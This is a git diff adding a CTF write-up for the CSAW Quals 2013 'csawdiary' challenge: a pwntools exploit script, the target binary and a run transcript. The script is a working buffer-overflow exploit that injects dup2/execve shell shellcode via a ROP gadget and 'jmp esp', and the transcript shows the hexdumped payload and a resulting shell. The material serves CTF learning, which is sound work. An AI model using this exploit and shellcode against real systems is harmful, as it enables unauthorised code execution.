diff --git a/2013/csaw-quals-2013/exploitation/csawdiary-300/README.md b/2013/csaw-quals-2013/exploitation/csawdiary-300/README.md new file mode 100644 index 0000000..fe22d8d --- /dev/null +++ b/2013/csaw-quals-2013/exploitation/csawdiary-300/README.md @@ -0,0 +1,3 @@ +# Info + +This writeup is based on http://www.blue-lotus.net/csaw-ctf-quals-2013-exp300-writeup/ \ No newline at end of file diff --git a/2013/csaw-quals-2013/exploitation/csawdiary-300/exploit.py b/2013/csaw-quals-2013/exploitation/csawdiary-300/exploit.py new file mode 100644 index 0000000..137637b --- /dev/null +++ b/2013/csaw-quals-2013/exploitation/csawdiary-300/exploit.py @@ -0,0 +1,40 @@ +from pwn import * +context(os='linux', arch='i386', log_level='DEBUG') + +# If a HOST is given on the cmdline, then assume that it is already +# running there +if 'HOST' in args: + HOST = args['HOST'] + PORT = int(args.get('PORT', 34266)) + plt_read = 0x80486e0 +else: + # Otherwise start the binary locally + HOST = "127.0.0.1" + PORT = 34266 + p = process('./fil_chal') + sleep(0.5) + binary = ELF("./fil_chal") + plt_read = binary.plt['read'] # read@plt: call 80486e0 + +SHELLCODE = asm(shellcraft.dupsh(4)) + +with remote(HOST, PORT) as r: + r.sendlineafter('UserName: ', 'csaw2013') + r.sendlineafter('Password: ', 'S1mplePWD') + r.sendlineafter('Entry Info: ', '65535') + + buf = "A" * 0x420 # 1056 + buf += p32(plt_read) + buf += p32(0x8049110) # pop pop pop ret + buf += p32(4) # fd + buf += p32(0x804b000) # static + buf += p32(2) + buf += p32(0x804b000) # static + buf += asm(shellcraft.i386.nop()) * 100 + buf += SHELLCODE + + log.info("Sending payload:\n%s" % hexdump(buf)) + r.send(buf) + r.send(asm('jmp esp')) # Jump to Shellcode + sleep(0.1) + r.interactive() diff --git a/2013/csaw-quals-2013/exploitation/csawdiary-300/fil_chal b/2013/csaw-quals-2013/exploitation/csawdiary-300/fil_chal new file mode 100755 index 0000000..fdc77be Binary files /dev/null and b/2013/csaw-quals-2013/exploitation/csawdiary-300/fil_chal differ diff --git a/2013/csaw-quals-2013/exploitation/csawdiary-300/transcript.txt b/2013/csaw-quals-2013/exploitation/csawdiary-300/transcript.txt new file mode 100644 index 0000000..49e30b8 --- /dev/null +++ b/2013/csaw-quals-2013/exploitation/csawdiary-300/transcript.txt @@ -0,0 +1,135 @@ +user@ubuntuvm:~/Desktop/csaw_diary$ python exploit.py +[+] Starting program './fil_chal': Done +[*] Security settings for 'fil_chal': + RELRO: Full RELRO + Stack Canary: No canary found + NX: NX disabled + PIE: No PIE + RPATH: No RPATH + RUNPATH: No RUNPATH +[DEBUG] cpp -C -nostdinc -undef -P -I/home/user/Desktop/binjitsu/pwnlib/data/includes /dev/stdin +[DEBUG] Assembling + .org 0x0 + .section .shellcode,"ax" + .intel_syntax noprefix + dup_1: + push 0x4 + pop ebx + push 0x3 + pop ecx + loop_2: + dec ecx + /* call dup2('ebx', 'ecx') */ + /* moving ebx into ebx, but this is a no-op */ + /* moving ecx into ecx, but this is a no-op */ + push 0x3f + pop eax + int 0x80 + jnz loop_2 + /* push '/bin///sh\x00' */ + push 0x68 + push 0x732f2f2f + push 0x6e69622f + /* call execve('esp', 0, 0) */ + mov ebx, esp + xor ecx, ecx + push 0xb + pop eax + cdq /* Set edx to 0, eax is known to be positive */ + int 0x80 +[DEBUG] /usr/bin/i386-linux-gnu-as -32 -o /tmp/pwn-asm-H5qiOE/step2 /tmp/pwn-asm-H5qiOE/step1 +[DEBUG] /usr/bin/i386-linux-gnu-objcopy -j .shellcode -Obinary /tmp/pwn-asm-H5qiOE/step2 /tmp/pwn-asm-H5qiOE/step3 +[+] Opening connection to 127.0.0.1 on port 34266: Done +[DEBUG] Received 0x2b5 bytes: + ' ************* $$$$$$$$$ AAAAAAA ***** *****\n' + ' * ******* * $ $$ $$ A A * * * * \n' + ' * * *** $ $ $$ A A A A * * * * \n' + ' * * $ $ A A___A A * * * * \n' + ' * * $ $ A A * * **** * *\n' + ' * * $ $ A AAA A * * * * * *\n' + ' * * *** $ $ A A A A * *** *** *\n' + ' * ******** * $$$$$$ $ A A A A * * \n' + ' ************* $$$$$$$$$$ AAAAAA AAAAAA ************* \n' + '\t\tDairy\n' + '\n' + 'UserName: ' +[DEBUG] Sent 0x9 bytes: + 'csaw2013\n' +[DEBUG] Received 0xa bytes: + 'Password: ' +[DEBUG] Sent 0xa bytes: + 'S1mplePWD\n' +[DEBUG] Received 0x26 bytes: + 'Welcome!\n' + 'http://youtu.be/KmtzQCSh6xk\n' + '\n' +[DEBUG] Received 0xc bytes: + 'Entry Info: ' +[DEBUG] Sent 0x6 bytes: + '65535\n' +[DEBUG] cpp -C -nostdinc -undef -P -I/home/user/Desktop/binjitsu/pwnlib/data/includes /dev/stdin +[DEBUG] Assembling + .org 0x0 + .section .shellcode,"ax" + .intel_syntax noprefix + nop +[DEBUG] /usr/bin/i386-linux-gnu-as -32 -o /tmp/pwn-asm-pBUQZ0/step2 /tmp/pwn-asm-pBUQZ0/step1 +[DEBUG] /usr/bin/i386-linux-gnu-objcopy -j .shellcode -Obinary /tmp/pwn-asm-pBUQZ0/step2 /tmp/pwn-asm-pBUQZ0/step3 +[*] Sending payload: + 00000000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 │AAAA│AAAA│AAAA│AAAA│ + * + 00000420 e0 86 04 08 10 91 04 08 04 00 00 00 00 b0 04 08 │····│····│····│····│ + 00000430 02 00 00 00 00 b0 04 08 90 90 90 90 90 90 90 90 │····│····│····│····│ + 00000440 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 │····│····│····│····│ + * + 00000490 90 90 90 90 90 90 90 90 90 90 90 90 6a 04 5b 6a │····│····│····│j·[j│ + 000004a0 03 59 49 6a 3f 58 cd 80 75 f8 6a 68 68 2f 2f 2f │·YIj│?X··│u·jh│h///│ + 000004b0 73 68 2f 62 69 6e 89 e3 31 c9 6a 0b 58 99 cd 80 │sh/b│in··│1·j·│X···│ + 000004c0 +[DEBUG] Sent 0x4c0 bytes: + 00000000 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 │AAAA│AAAA│AAAA│AAAA│ + * + 00000420 e0 86 04 08 10 91 04 08 04 00 00 00 00 b0 04 08 │····│····│····│····│ + 00000430 02 00 00 00 00 b0 04 08 90 90 90 90 90 90 90 90 │····│····│····│····│ + 00000440 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 90 │····│····│····│····│ + * + 00000490 90 90 90 90 90 90 90 90 90 90 90 90 6a 04 5b 6a │····│····│····│j·[j│ + 000004a0 03 59 49 6a 3f 58 cd 80 75 f8 6a 68 68 2f 2f 2f │·YIj│?X··│u·jh│h///│ + 000004b0 73 68 2f 62 69 6e 89 e3 31 c9 6a 0b 58 99 cd 80 │sh/b│in··│1·j·│X···│ + 000004c0 +[DEBUG] cpp -C -nostdinc -undef -P -I/home/user/Desktop/binjitsu/pwnlib/data/includes /dev/stdin +[DEBUG] Assembling + .org 0x0 + .section .shellcode,"ax" + .intel_syntax noprefix + jmp esp +[DEBUG] /usr/bin/i386-linux-gnu-as -32 -o /tmp/pwn-asm-5LAGnQ/step2 /tmp/pwn-asm-5LAGnQ/step1 +[DEBUG] /usr/bin/i386-linux-gnu-objcopy -j .shellcode -Obinary /tmp/pwn-asm-5LAGnQ/step2 /tmp/pwn-asm-5LAGnQ/step3 +[DEBUG] Sent 0x2 bytes: + 00000000 ff e4 │··│ + 00000002 +[*] Switching to interactive mode +$ ls -l +[DEBUG] Sent 0x6 bytes: + 'ls -l\n' +[DEBUG] Received 0x6f bytes: + 'total 16\n' + '-rw-rw-r-- 1 user user 1125 Mar 14 16:35 exploit.py\n' + '-rwxr-x--x 1 user user 9552 Mar 14 04:36 fil_chal\n' +total 16 +-rw-rw-r-- 1 user user 1125 Mar 14 16:35 exploit.py +-rwxr-x--x 1 user user 9552 Mar 14 04:36 fil_chal +$ whoami +[DEBUG] Sent 0x7 bytes: + 'whoami\n' +[DEBUG] Received 0x5 bytes: + 'user\n' +user +$ exit +[DEBUG] Sent 0x5 bytes: + 'exit\n' +[*] Got EOF while reading in interactive +$ +[*] Interrupted +[*] Closed connection to 127.0.0.1 port 34266 +[*] Program './fil_chal' stopped with exit code 255